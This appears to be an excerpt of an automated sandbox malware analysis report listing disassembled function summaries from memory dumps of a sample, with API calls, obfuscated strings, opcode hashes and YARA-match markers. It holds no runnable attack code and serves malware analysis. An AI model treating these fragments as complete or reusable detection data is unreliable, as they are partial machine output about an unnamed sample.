                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: CD^O$_DC[
                                                • API String ID: 2296764815-3597986494
                                                • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                                • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                                • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                                • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D0787E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 1385522511-3597986494
                                                • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction ID: 29616861664ccf82fd99b5c3f471ce708fba2fd4307b1426c64272f2ceb2adaf
                                                • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction Fuzzy Hash: B201F970F043549BC720EFB8AD51BAD7360EB18315F9082B9D1155B2D1EBB4B541CB99
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D072BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 1385522511-3597986494
                                                • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction ID: 67b41bf4fea855232aecff75476d19b09ff746544a2bb70f0378110791ebaebc
                                                • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction Fuzzy Hash: 5501F9B1F00248DFC720EFB8AD51B6D7360EB15304FA042A9E5195B2D0E7747541CB56
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B686E5
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 4132704954-3597986494
                                                • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction ID: 92e142771ffdf2e382be81bdbe006d865701c3eb5bd01b7da73c64e893db0b1b
                                                • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction Fuzzy Hash: 1901F970F08358DBD720FF7DAD41A5D73A0EB19210F9005A9D11657350DB78B985CB89
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B68125
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 4132704954-3597986494
                                                • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction ID: 286eae8572910f8fd18f89a5e6f1ec8c7e118476eda1404144ba1a6d9747158b
                                                • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction Fuzzy Hash: 5B0149B1F01208DFCB20FF68FC41A6D73A0EB1A200FA001A9E41A5B350D73869868B46
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407869
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: DCDO$EDO*
                                                • API String ID: 2296764815-3480089779
                                                • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                                • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                                • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                                • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407979
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: DCDO$^]E*
                                                • API String ID: 2296764815-2708296792
                                                • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                                • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                                • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                                • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D06C69
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: DCDO$EDO*
                                                • API String ID: 1385522511-3480089779
                                                • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction ID: b5e856f7396c3c60b266ce565ba433e5d85438ef20bebead108bd85afd4598a2
                                                • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction Fuzzy Hash: 0D016D74F04208DBDB20DFA4E851F5DBBB0EB14708F9081BAD915977D0DA34A902CF59
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D06D79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: DCDO$^]E*
                                                • API String ID: 1385522511-2708296792
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B67AD0
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: DCDO$EDO*
                                                • API String ID: 4132704954-3480089779
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B67BE0
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: DCDO$^]E*
                                                • API String ID: 4132704954-2708296792